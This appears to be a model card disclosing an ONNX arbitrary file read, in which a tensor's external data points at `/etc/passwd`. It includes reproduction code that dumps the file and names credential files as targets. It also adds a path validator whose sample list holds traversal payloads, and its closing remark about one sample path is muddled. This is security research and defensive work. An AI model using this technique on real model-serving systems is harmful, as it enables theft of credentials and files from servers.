---
tags:
  - security
  - vulnerability
  - poc
license: mit
---

# ONNX Arbitrary File Read PoC

**⚠️ WARNING: Malicious Model - For Security Research Only**

This model demonstrates a critical vulnerability: **Arbitrary File Read via External Data Path Traversal**.

## Vulnerability Description

The ONNX runtime does not validate the `location` field in `TensorProto.external_data`, so a malicious model can point a tensor's external data at any file on the server's filesystem and have the runtime read it.

## How It Works

1. The model's tensor has `external_data.location` set to `/etc/passwd` (an absolute path)
2. When the model is loaded via `onnxruntime.InferenceSession()`, the runtime opens and reads this file
3. The file content is loaded into the tensor data
4. The inference output therefore contains the sensitive file content

## Reproduction

```python
import onnxruntime as ort
import numpy as np

# Load malicious model
sess = ort.InferenceSession("file_read_poc.onnx")

# Run inference (no input needed)
outputs = sess.run(None, {})

# Decode file content
file_data = bytes(outputs[0].tolist())
print(file_data.decode('utf-8', errors='ignore'))
# Output: root:x:0:0:root:/root:/bin/bash...
```

## Impact

- **Severity**: Critical
- **Attack Vector**: Model-as-a-Service (MaaS) platforms
- **Affected**: Any system running user-uploaded ONNX models
- **Consequences**:
  - Credential theft (`~/.aws/credentials`, SSH keys)
  - Source code leakage
  - Configuration file exposure
  - System information disclosure

## Remediation

1. Validate `external_data.location` to ensure it is relative and resolves inside the model directory
2. Reject absolute paths
3. Implement path sandboxing
4. Add an `--allow-external-data` flag (disabled by default)

## Responsible Disclosure

This PoC is submitted through Huntr's responsible disclosure program.

**Category**: MFV (Model File Vulnerability)
**Status**: Under Review
**Reporter**: Security Researcher
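The following is an added example of the pre-load check that remediation items 1 to 3 call for; it is not code from this PoC or from the ONNX project. It validates each `external_data.location` against the directory the model lives in, rejecting absolute paths, drive-letter paths, and `..` traversal, and only then would a serving platform hand the file to `onnxruntime`. The `SAMPLE_ENTRIES` list and the `/tmp/models/poc` directory are constructed for illustration; `external_locations_from_onnx` walks a real `.onnx` file with the `onnx` package (initializers plus tensor attributes, recursing into `If`/`Loop` subgraphs) and imports it lazily so the validator itself needs nothing beyond the standard library.

```python
import os
from typing import Iterable, List, Tuple

# Constructed sample of (tensor name, external_data.location) pairs, as a
# scanner would extract them from a model. "payload" mirrors the PoC's
# absolute-path trick; the others are traversal and Windows-style variants.
SAMPLE_ENTRIES = [
    ("weights", "weights.bin"),
    ("bias", "shards/bias.bin"),
    ("payload", "/etc/passwd"),
    ("traversal", "../../etc/shadow"),
    ("windows", "C:\\Windows\\win.ini"),
]


def is_safe_external_location(location: str, model_dir: str) -> bool:
    """Accept only a relative location that resolves inside model_dir."""
    if not location or "\x00" in location:
        return False
    # Treat backslashes as separators so Windows-style paths are judged the
    # way a Windows runtime would interpret them.
    loc = location.replace("\\", "/")
    # Reject absolute paths: POSIX ("/etc/passwd") and drive-letter ("C:/...").
    if loc.startswith("/") or (len(loc) > 1 and loc[1] == ":"):
        return False
    base = os.path.realpath(model_dir)
    resolved = os.path.realpath(os.path.join(base, loc))
    try:
        # After resolving "..", the path must still be under the model directory.
        return os.path.commonpath([base, resolved]) == base
    except ValueError:
        return False


def find_unsafe_external_locations(entries: Iterable[Tuple[str, str]],
                                   model_dir: str) -> List[Tuple[str, str]]:
    """Return the (tensor name, location) pairs that must be rejected."""
    return [(name, loc) for name, loc in entries
            if not is_safe_external_location(loc, model_dir)]


def external_locations_from_onnx(model_path: str) -> List[Tuple[str, str]]:
    """Collect (tensor name, location) pairs from a .onnx file without ever
    opening the external files themselves. Needs the `onnx` package."""
    import onnx  # lazy: only required when scanning a real model file

    def tensors_in(graph):
        for t in graph.initializer:
            yield t
        for node in graph.node:
            for attr in node.attribute:
                if attr.type == onnx.AttributeProto.TENSOR:
                    yield attr.t
                elif attr.type == onnx.AttributeProto.TENSORS:
                    yield from attr.tensors
                elif attr.type == onnx.AttributeProto.GRAPH:
                    yield from tensors_in(attr.g)  # If/Loop/Scan bodies
                elif attr.type == onnx.AttributeProto.GRAPHS:
                    for g in attr.graphs:
                        yield from tensors_in(g)

    # load_external_data=False parses the protobuf only; no location is followed.
    model = onnx.load(model_path, load_external_data=False)
    found = []
    for t in tensors_in(model.graph):
        if t.data_location == onnx.TensorProto.EXTERNAL:
            for kv in t.external_data:
                if kv.key == "location":
                    found.append((t.name, kv.value))
    return found


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        model_dir = os.path.dirname(os.path.abspath(sys.argv[1]))
        entries = external_locations_from_onnx(sys.argv[1])
    else:
        model_dir = "/tmp/models/poc"  # constructed upload directory
        entries = SAMPLE_ENTRIES
    bad = find_unsafe_external_locations(entries, model_dir)
    for name, loc in bad:
        print(f"REJECT tensor {name!r}: external_data.location={loc!r}")
    sys.exit(1 if bad else 0)
```

Run it with a model path to scan a real file, or with no arguments to see the constructed sample rejected. Note that the check is done on the resolved path, not by string-matching `..`: a location such as `../poc-evil/weights.bin` is rejected even though it never leaves the parent of the model directory in name only, and a bare relative-path test would have let it through.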